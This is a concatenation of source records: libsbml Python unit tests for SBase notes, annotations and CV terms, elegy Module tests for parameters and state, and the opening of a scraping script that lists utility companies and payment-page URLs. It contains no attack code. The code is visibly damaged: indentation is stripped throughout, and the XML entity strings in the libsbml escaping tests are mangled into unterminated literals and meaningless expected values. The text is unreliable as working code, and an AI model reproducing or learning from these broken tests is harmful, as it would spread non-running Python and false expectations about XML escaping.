def test_SBase_appendNotesString7(self):
notes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>";
taggednewnotes = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
addnotes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is more test notes </p>\n" + "</body>")
addnotes2 = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString8(self):
notes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is a test note </p>\n" + "</body>")
taggednewnotes = ("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
taggednewnotes2 = ("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
" </body>\n" +
"</notes>")
addnotes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>";
addnotes2 = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" + "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>";
addnotes3 = wrapString("<notes>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
"</notes>")
addnotes4 = wrapString("<notes>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes2 ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes3)
notes3 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes3 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes4)
notes4 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes4 == taggednewnotes2 ))
pass
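# CV-term lookups: given a resource URI, SBase should report the biological
# or model qualifier that resource was registered under.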
def test_SBase_getQualifiersFromResources(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_ENCODES)
cv.addResource( "foo")
self.S.setMetaId( "sbase1")
self.S.addCVTerm(cv)
self.assert_( self.S.getResourceBiologicalQualifier( "foo") == libsbml.BQB_ENCODES )
cv1 = libsbml.CVTerm(libsbml.MODEL_QUALIFIER)
cv1.setModelQualifierType(libsbml.BQM_IS)
cv1.addResource( "bar")
self.S.addCVTerm(cv1)
self.assert_( self.S.getResourceModelQualifier( "bar") == libsbml.BQM_IS )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv1 ]; _dummyList[:] = []; del _dummyList
pass
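# setAnnotation round-trip: set from a node, re-set from the getter, clear
# with None, unset, then verify that character references and predefined
# entities survive toXMLString() unchanged.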
def test_SBase_setAnnotation(self):
token = libsbml.XMLToken("This is a test note")
node = libsbml.XMLNode(token)
self.S.setAnnotation(node)
self.assert_( self.S.isSetAnnotation() == True )
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
self.assert_(( "This is a test note" == t1.getChild(0).getCharacters() ))
if (self.S.getAnnotation() == node):
pass
self.S.setAnnotation(self.S.getAnnotation())
self.assert_(( "This is a test note" == self.S.getAnnotation().getChild(0).getCharacters() ))
self.S.setAnnotation(None)
self.assert_( self.S.isSetAnnotation() == False )
if (self.S.getAnnotation() != None):
pass
self.S.setAnnotation(node)
self.assert_( self.S.isSetAnnotation() == True )
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
token = libsbml.XMLToken("(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; �a8; ¨ ¨")
node = libsbml.XMLNode(token)
self.S.setAnnotation(node)
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
s = t1.getChild(0).toXMLString()
expected = "(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; &#00a8; &#0168 &#x00a8";
self.assert_(( expected == s ))
token = libsbml.XMLToken("& ' > < \" & ' > < "")
node = libsbml.XMLNode(token)
self.S.setAnnotation(node)
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
s2 = t1.getChild(0).toXMLString()
expected2 = "& ' > < " & ' > < "";
self.assert_(( expected2 == s2 ))
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_setAnnotationString(self):
annotation = "This is a test note";
taggedannotation = "<annotation>This is a test note</annotation>";
self.S.setAnnotation(annotation)
self.assert_( self.S.isSetAnnotation() == True )
if (( taggedannotation != self.S.getAnnotationString() )):
pass
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
self.assert_(( "This is a test note" == t1.getChild(0).getCharacters() ))
self.S.setAnnotation(self.S.getAnnotationString())
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
chars = self.S.getAnnotationString()
self.assert_(( taggedannotation == chars ))
self.S.setAnnotation( "")
self.assert_( self.S.isSetAnnotation() == False )
if (self.S.getAnnotationString() != None):
pass
self.S.setAnnotation(taggedannotation)
self.assert_( self.S.isSetAnnotation() == True )
if (( taggedannotation != self.S.getAnnotationString() )):
pass
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_(( "This is a test note" == t2.getCharacters() ))
pass
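# setMetaId: set an id, round-trip it through the getter, clear with "".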
def test_SBase_setMetaId(self):
metaid = "x12345";
self.S.setMetaId(metaid)
self.assert_(( metaid == self.S.getMetaId() ))
self.assertEqual( True, self.S.isSetMetaId() )
if (self.S.getMetaId() == metaid):
pass
self.S.setMetaId(self.S.getMetaId())
self.assert_(( metaid == self.S.getMetaId() ))
self.S.setMetaId("")
self.assertEqual( False, self.S.isSetMetaId() )
if (self.S.getMetaId() != None):
pass
pass
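# setNotes mirrors the setAnnotation test above, but on a Model(1,2) object,
# including the same entity-escaping checks at the end.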
def test_SBase_setNotes(self):
c = libsbml.Model(1,2)
token = libsbml.XMLToken("This is a test note")
node = libsbml.XMLNode(token)
c.setNotes(node)
self.assert_( c.isSetNotes() == True )
if (c.getNotes() == node):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
self.assert_(( "This is a test note" == t1.getChild(0).getCharacters() ))
c.setNotes(c.getNotes())
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
chars = t1.getChild(0).getCharacters()
self.assert_(( "This is a test note" == chars ))
c.setNotes(None)
self.assert_( c.isSetNotes() == False )
if (c.getNotes() != None):
pass
c.setNotes(node)
self.assert_( c.isSetNotes() == True )
token = libsbml.XMLToken("(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; �a8; ¨ ¨")
node = libsbml.XMLNode(token)
c.setNotes(node)
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
s = t1.getChild(0).toXMLString()
expected = "(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; &#00a8; &#0168 &#x00a8";
self.assert_(( expected == s ))
token = libsbml.XMLToken("& ' > < \" & ' > < "")
node = libsbml.XMLNode(token)
c.setNotes(node)
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
s2 = t1.getChild(0).toXMLString()
expected2 = "& ' > < " & ' > < "";
self.assert_(( expected2 == s2 ))
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_setNotesString(self):
c = libsbml.Model(1,2)
notes = "This is a test note";
taggednotes = "<notes>This is a test note</notes>";
c.setNotes(notes)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_(( "This is a test note" == t2.getCharacters() ))
c.setNotes(c.getNotesString())
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
chars = c.getNotesString()
self.assert_(( taggednotes == chars ))
c.setNotes("")
self.assert_( c.isSetNotes() == False )
if (c.getNotesString() != None):
pass
c.setNotes(taggednotes)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_(( "This is a test note" == t2.getCharacters() ))
pass
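# In SBML Level 3 the content of <notes> must be XHTML, so setting a bare
# string is rejected unless the addMarkup flag (second argument, used in the
# next test) asks libsbml to wrap it in a <p> element first.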
def test_SBase_setNotesString_l3(self):
c = libsbml.Model(3,1)
notes = "This is a test note";
c.setNotes(notes)
self.assert_( c.isSetNotes() == False )
pass
def test_SBase_setNotesString_l3_addMarkup(self):
c = libsbml.Model(3,1)
notes = "This is a test note";
taggednotes = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note</p>\n" +
"</notes>")
c.setNotes(notes, True)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_( t2.getNumChildren() == 1 )
t3 = t2.getChild(0)
self.assert_(( "This is a test note" == t3.getCharacters() ))
c.setNotes(c.getNotesString(), True)
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
chars = c.getNotesString()
self.assert_(( taggednotes == chars ))
c.setNotes("", True)
self.assert_( c.isSetNotes() == False )
if (c.getNotesString() != None):
pass
c.setNotes(taggednotes, True)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_( t2.getNumChildren() == 1 )
t3 = t2.getChild(0)
self.assert_(( "This is a test note" == t3.getCharacters() ))
pass
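# unsetAnnotation must also remove the RDF block that libsbml synthesizes for
# CV terms, not just the user-supplied annotation element.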
def test_SBase_unsetAnnotationWithCVTerms(self):
annt = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
"</annotation>")
annt_with_cvterm = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" " +
"xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " +
"xmlns:dcterms=\"http://purl.org/dc/terms/\" " +
"xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" " +
"xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" " +
"xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" +
" <rdf:Description rdf:about=\"#_000001\">\n" +
" <bqbiol:is>\n" +
" <rdf:Bag>\n" +
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0005895\"/>\n" +
" </rdf:Bag>\n" +
" </bqbiol:is>\n" +
" </rdf:Description>\n" +
" </rdf:RDF>\n" +
"</annotation>")
self.S.setAnnotation(annt)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
self.S.setAnnotation(annt)
self.S.setMetaId( "_000001")
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_IS)
cv.addResource( "http://www.geneontology.org/#GO:0005895")
self.S.addCVTerm(cv)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt_with_cvterm == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
pass
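# Likewise, unsetAnnotation must drop the RDF block synthesized from a
# ModelHistory (creator, created/modified dates).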
def test_SBase_unsetAnnotationWithModelHistory(self):
h = libsbml.ModelHistory()
c = libsbml.ModelCreator()
annt = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
"</annotation>")
annt_with_modelhistory = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" " +
"xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " +
"xmlns:dcterms=\"http://purl.org/dc/terms/\" " +
"xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" " +
"xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" " +
"xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" +
" <rdf:Description rdf:about=\"#_000001\">\n" +
" <dc:creator>\n" +
" <rdf:Bag>\n" +
" <rdf:li rdf:parseType=\"Resource\">\n" +
" <vCard:N rdf:parseType=\"Resource\">\n" +
" <vCard:Family>Keating</vCard:Family>\n" +
" <vCard:Given>Sarah</vCard:Given>\n" +
" </vCard:N>\n" +
" <vCard:EMAIL>sbml-team@caltech.edu</vCard:EMAIL>\n" +
" </rdf:li>\n" +
" </rdf:Bag>\n" +
" </dc:creator>\n" +
" <dcterms:created rdf:parseType=\"Resource\">\n" +
" <dcterms:W3CDTF>2005-12-29T12:15:45+02:00</dcterms:W3CDTF>\n" +
" </dcterms:created>\n" +
" <dcterms:modified rdf:parseType=\"Resource\">\n" +
" <dcterms:W3CDTF>2005-12-30T12:15:45+02:00</dcterms:W3CDTF>\n" +
" </dcterms:modified>\n" +
" </rdf:Description>\n" +
" </rdf:RDF>\n" +
"</annotation>")
self.S.setAnnotation(annt)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
self.S.setAnnotation(annt)
self.S.setMetaId( "_000001")
c.setFamilyName("Keating")
c.setGivenName("Sarah")
c.setEmail("sbml-team@caltech.edu")
h.addCreator(c)
dc = libsbml.Date(2005,12,29,12,15,45,1,2,0)
h.setCreatedDate(dc)
dm = libsbml.Date(2005,12,30,12,15,45,1,2,0)
h.setModifiedDate(dm)
self.S.setModelHistory(h)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt_with_modelhistory == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
_dummyList = [ h ]; _dummyList[:] = []; del _dummyList
pass
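# Terms sharing a qualifier are merged by addCVTerm (their resources are
# pooled), so the four terms added below collapse to two before the unset.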
def test_SBase_unsetCVTerms(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_ENCODES)
cv.addResource( "foo")
self.S.setMetaId( "sbase1")
self.S.addCVTerm(cv)
cv1 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv1.setBiologicalQualifierType(libsbml.BQB_IS)
cv1.addResource( "bar")
self.S.addCVTerm(cv1)
cv2 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv2.setBiologicalQualifierType(libsbml.BQB_IS)
cv2.addResource( "bar1")
self.S.addCVTerm(cv2)
cv4 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv4.setBiologicalQualifierType(libsbml.BQB_IS)
cv4.addResource( "bar1")
self.S.addCVTerm(cv4)
self.assert_( self.S.getNumCVTerms() == 2 )
self.S.unsetCVTerms()
self.assert_( self.S.getNumCVTerms() == 0 )
#self.assert_( self.S.getCVTerms() == None )
self.assert_( len(self.S.getCVTerms()) == 0 )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv4 ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSBase))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
--- end of record; per-file quality-signal columns omitted ---
hexsha: 71cf82ff6ae273ede1b27f6d9c1b75e91a92ed07 | size: 7,945 | ext: py | lang: Python
path: elegy/module_test.py | repo: abhinavsp0730/elegy | head_hexsha: d3e6ebba0d56b5d9a489f75c9512eb8aaf214c6d | licenses: ["Apache-2.0"]
import inspect
from unittest import TestCase
import jax
import jax.numpy as jnp
import pytest
import elegy
from elegy import utils
import numpy as np
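# Tests for elegy's hook-style Module API: inside call(), get_parameter and
# get_state register named values on the current module, while apply() runs
# the module functionally and collects losses, metrics, and summaries.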
class ModuleTest(TestCase):
class Linear(elegy.Module):
def __init__(self, units):
super().__init__()
self.units = units
def call(self, x):
w = elegy.get_parameter(
"w", [x.shape[-1], self.units], initializer=jnp.ones
)
b = elegy.get_parameter("b", [self.units], initializer=jnp.ones)
n = elegy.get_state("n", [], dtype=jnp.int32, initializer=jnp.zeros)
elegy.set_state("n", n + 1)
y = jnp.dot(x, w) + b
elegy.add_loss("activation_sum", jnp.sum(y))
elegy.add_metric("activation_mean", jnp.mean(y))
return y
class MyModule(elegy.Module):
def __init__(self):
super().__init__()
self.linear = ModuleTest.Linear(6)
self.linear1 = ModuleTest.Linear(7)
def call(self, x) -> np.ndarray:
x = self.linear(x)
x = self.linear1(x)
self.bias = elegy.get_parameter(
"bias", [x.shape[-1]], jnp.float32, jnp.ones
)
return x + self.bias * 10
def test_basic(self):
x = np.random.uniform(-1, 1, size=(4, 5))
module = ModuleTest.MyModule()
module.init()(x)
y: np.ndarray
y, context = module.apply()(x)
assert y.shape == (4, 7)
print(module.get_parameters())
def test_get_parameters(self):
x = np.random.uniform(-1, 1, size=(4, 5))
m = ModuleTest.MyModule()
m.init()(x)
parameters = m.get_parameters()
states = m.get_states()
assert "bias" in parameters
assert "linear" in parameters
assert "w" in parameters["linear"]
assert "b" in parameters["linear"]
assert states["linear"]["n"] == 0
assert states["linear1"]["n"] == 0
assert "linear1" in parameters
y: np.ndarray
y, context = m.apply(get_summaries=True)(x)
parameters = m.get_parameters()
states = m.get_states()
assert y.shape == (4, 7)
assert "bias" in parameters
assert "linear" in parameters
assert "w" in parameters["linear"]
assert "b" in parameters["linear"]
assert m.linear.get_states()["n"] == 1
assert states["linear"]["n"] == 1
assert "linear1" in parameters
assert "activation_sum_loss" in context.losses
assert "my_module/linear/activation_mean" in context.metrics
assert "my_module/linear_1/activation_mean" in context.metrics
assert context.summaries[0][:2] == (m.linear, "my_module/linear")
assert context.summaries[0][2].shape == (4, 6)
assert context.summaries[1][:2] == (m.linear1, "my_module/linear_1")
assert context.summaries[1][2].shape == (4, 7)
assert context.summaries[2][:2] == (m, "my_module")
assert context.summaries[2][2].shape == (4, 7)
m.set_parameters(jax.tree_map(lambda x: -x, parameters))
parameters = m.get_parameters()
states = m.get_states()
assert parameters["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear1.get_parameters()["w"][0, 0] == -1
assert m.linear1.get_parameters()["b"][0] == -1
assert m.parameters_size(include_submodules=False) == 7
current_parameters = m.get_parameters()
current_states = m.get_states()
m.reset()
parameters = m.get_parameters()
states = m.get_states()
assert parameters == {}
assert m.parameters_size() == 0
m.set_parameters(current_parameters)
m.set_states(current_states)
assert m.get_parameters()["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear1.get_parameters()["w"][0, 0] == -1
assert m.linear1.get_parameters()["b"][0] == -1
class ModuleDynamicTest(TestCase):
class Linear(elegy.Module):
def __init__(self, units):
super().__init__()
self.units = units
def call(self, x):
w = elegy.get_parameter(
"w", [x.shape[-1], self.units], initializer=jnp.ones
)
b = elegy.get_parameter("b", [self.units], initializer=jnp.ones)
n = elegy.get_state("n", [], dtype=jnp.int32, initializer=jnp.zeros)
elegy.set_state("n", n + 1)
y = jnp.dot(x, w) + b
elegy.add_loss("activation_sum", jnp.sum(y))
elegy.add_metric("activation_mean", jnp.mean(y))
return y
class MyModule(elegy.Module):
def call(self, x) -> np.ndarray:
x = ModuleDynamicTest.Linear(6)(x)
x = ModuleDynamicTest.Linear(7)(x)
self.bias = elegy.get_parameter("bias", [x.shape[-1]], initializer=jnp.ones)
return x + self.bias * 10
def test_basic(self):
x = np.random.uniform(-1, 1, size=(4, 5))
module = ModuleDynamicTest.MyModule()
module.init()(x)
y: np.ndarray
y, context = module.apply()(x)
assert y.shape == (4, 7)
print(module.get_parameters())
def test_get_parameters(self):
x = np.random.uniform(-1, 1, size=(4, 5))
m = ModuleDynamicTest.MyModule()
m.init()(x)
assert "bias" in m.get_parameters()
assert "linear" in m.get_parameters()
assert "w" in m.get_parameters()["linear"]
assert "b" in m.get_parameters()["linear"]
assert m.linear.get_states()["n"] == 0
assert m.get_states()["linear"]["n"] == 0
assert "linear_1" in m.get_parameters()
y: np.ndarray
y, context = m.apply(get_summaries=True)(x)
assert y.shape == (4, 7)
assert "bias" in m.get_parameters()
assert "linear" in m.get_parameters()
assert "w" in m.get_parameters()["linear"]
assert "b" in m.get_parameters()["linear"]
assert m.linear.get_states()["n"] == 1
assert m.get_states()["linear"]["n"] == 1
assert "linear_1" in m.get_parameters()
assert "activation_sum_loss" in context.losses
assert "my_module/linear/activation_mean" in context.metrics
assert "my_module/linear_1/activation_mean" in context.metrics
assert context.summaries[0][:2] == (m.linear, "my_module/linear")
assert context.summaries[0][2].shape == (4, 6)
assert context.summaries[1][:2] == (m.linear_1, "my_module/linear_1")
assert context.summaries[1][2].shape == (4, 7)
assert context.summaries[2][:2] == (m, "my_module")
assert context.summaries[2][2].shape == (4, 7)
m.set_parameters(jax.tree_map(lambda x: -x, m.get_parameters()))
assert m.get_parameters()["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear_1.get_parameters()["w"][0, 0] == -1
assert m.linear_1.get_parameters()["b"][0] == -1
assert m.parameters_size(include_submodules=False) == 7
current_parameters = m.get_parameters()
current_states = m.get_states()
m.reset()
assert m.get_parameters() == {}
assert m.parameters_size() == 0
m.set_parameters(current_parameters)
m.set_states(current_states)
assert m.get_parameters()["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear_1.get_parameters()["w"][0, 0] == -1
assert m.linear_1.get_parameters()["b"][0] == -1
--- end of record; per-file quality-signal columns omitted ---
hexsha: 71d19262f68740221520f73674972574d4f1e690 | size: 52,285 | ext: py | lang: Python
path: Scrape.py | repo: ReedGraff/Data-Science-Scraping | head_hexsha: 14ab283a5477827447f502c3c76612df380912e3 | licenses: ["MIT"]
from googlesearch import search
from htmldate import find_date
import pandas as pd
import numpy as np
# Utility names and locations to look up via Google search.
query = ['Tuskegee,AL', 'West Kentucky Cooperative', 'ACE Power,MS', 'Albertville,AL', 'Benson,NC', 'Benton County,TN', 'Blakely,GA', 'Blue Ridge Mountain,GA', 'Bolivar,TN', 'Caney Fork EC,TN', 'Cleveland Utilities,TN', 'Clinton,TN', 'Columbia Power and Water,TN', 'Cowlitz PUD,WA', 'Denton,TX', 'Dickson Electric,TN', 'Dixie EC,AL', 'Dothan,AL', 'Douglas,GA', 'Franklin EPB,KY', 'Fulton,KY', 'Glasgow EPB,KY', 'Guntersville,AL', 'Holly Springs,MS', 'Hopkinsville,KY', 'Humboldt Utilities,TN', 'JEA,FL', 'Kansas City BPU,KS', 'La Grange,NC', 'Lake Worth Beach,FL', 'Lenoir City,TN', 'Lexington Electric,TN', 'MLGW,TN', 'Marshall-DeKalb EC,AL', 'Mayfield,KY', 'Midstate,OR', 'Mt Pleasant,TN', 'New Bern,NC', 'Ocala,FL', 'Orlando,FL', 'Pickwick EC,TN', 'Ripley Power and Light,TN', 'Rockwood,TN', 'Rush Shelby,IN', 'Russellville EPB,KY', 'Scottsboro EPB,AL', 'Selma,NC', 'Shelbyville,TN', 'Southwest TN,TN', 'St Croix EC,WI', 'TVEC,TN', 'Tarrant Electric,AL', 'Tombigbee EPA,MS', 'Tri-State,GA', 'Union City,TN', 'Wilson Internet,NC', 'Wilson,NC']
utility_links = ['https://www.yourubt.com/', 'https://wkrecc.com/index.php/18-billing', 'https://ace-power.com/account/payment-options/', 'http://www.mub-albertville.com/', 'https://www.townofbenson.com/2191/Bill-Payment', 'http://www.bcestn.org/index.php/manage-existing-service/pay-my-monthly-bill/106-pay-by-phone-or-online', 'https://cityofblakely.net/pay-online/', 'https://www.cityofblueridgega.gov/WastewaterandWater.aspx', 'https://www.bolivarutility.com/', 'https://www.caneyforkec.com', 'http://www.clevelandutilities.com/', 'http://www.clintonutilities.com/pmtopts.html', 'https://cpws.com/my-account/', 'https://www.cowlitzpud.org/customer-services/pay-my-bill/', 'https://www.cityofdenton.com/en-us/pay-my-bill', 'https://dicksonelectric.com/', 'https://www.dixie.coop/online-account-access', 'https://www.dothan.org/175/Pay-View-Utility-Bill-Online', 'https://www.cityofdouglasga.gov/84/Make-a-Utility-Payment', 'http://www.franklinepb.com/bill-payment-options', 'https://www.fulton-ky.com/frequently-asked-questions/', 'http://www.glasgowepb.net/?page_id=343', 'https://guntersvilleal.org/departments/utilites/', 'http://www.hsutilities.com/', 'https://hop-electric.com/electric/residential-electric/bill-payment-options/', 'https://www.humboldtutilities.com/', 'https://www.jea.com/my_account/billing_and_payment_options/', 'https://www.bpu.com/', 'https://lagrangenc.com/703/Online-Billing', 'https://lakeworthbeachfl.gov/payment-portal/', 'https://www.lcub.com/', 'https://www.lexingtontn.gov/pay_online.html', 'https://www.mlgw.com/residential/payingyourbill_b', 'https://mdec.org/', 'https://www.mayfieldews.com/index.php/electric/smartpay', 'https://midstateelectric.coop/payment-options', 'https://www.mtpleasant-tn.gov/utility-payments', 'https://www.newbernnc.gov/departments/administration/finance/utilities_business_office/pay_my_bill.php', 'https://www.ocalafl.org/government/city-departments-a-h/customer-service-office/pay-my-bill', 'https://www.orangecountyfl.net/WaterGarbageRecycling/BillPaymentOptions.aspx', 'http://www.pickwickec.com/bill-payment-information/', 'https://ripleypower.com/account/payment-options.php', 'https://cityofrockwood.com/online-bill-pay', 'https://www.rse.coop/', 'https://www.epbnet.com/index.php/support/bill-pay/', 'https://www.sepb.net/payment-2/bill-pay/', 'https://selma-nc.com/departments/customer-service/', 'http://www.shelbyvillepower.com/', 'https://www.stemc.com/my-payment-options', 'https://www.scecnet.net/content/pay-my-bill', 'https://www.tvec.com/index.asp?fullsite=1', 'https://www.needhelppayingbills.com/html/tarrant_county_assistance_prog.html', 'https://www.tombigbeeelectric.com/payments', 'https://www.tsemc.net/my-account/pay-bill-online/', 'http://unioncitytn.gov/pay-online.html', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options', 'https://www.wilsonnc.org/residents/all-departments/financial-services/customer-service-and-business-operations/payment-options']
gov_links = ['https://www.cityofalbertville.com/', 'https://www.townofbenson.com/', 'https://www.bentoncountytn.gov/', 'https://cityofblakely.net/', 'https://www.cityofblueridgega.gov/', 'https://www.cityofbolivar.com/', 'https://www.caneyforkec.com', 'http://www.clevelandutilities.com/', 'http://www.clintontn.net/', 'https://cpws.com/', 'https://www.cowlitzpud.org/', 'https://www.dentoncounty.gov/', 'https://dicksonelectric.com/', 'https://www.dixie.coop/', 'https://www.dothan.org/', 'https://www.cityofdouglasga.gov/', 'http://www.franklinepb.com/', 'https://www.fulton-ky.com/', 'http://www.glasgowepb.net/', 'https://guntersvilleal.org/', 'https://hollyspringsmsus.com/', 'https://www.hopkinsvilleky.us/', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
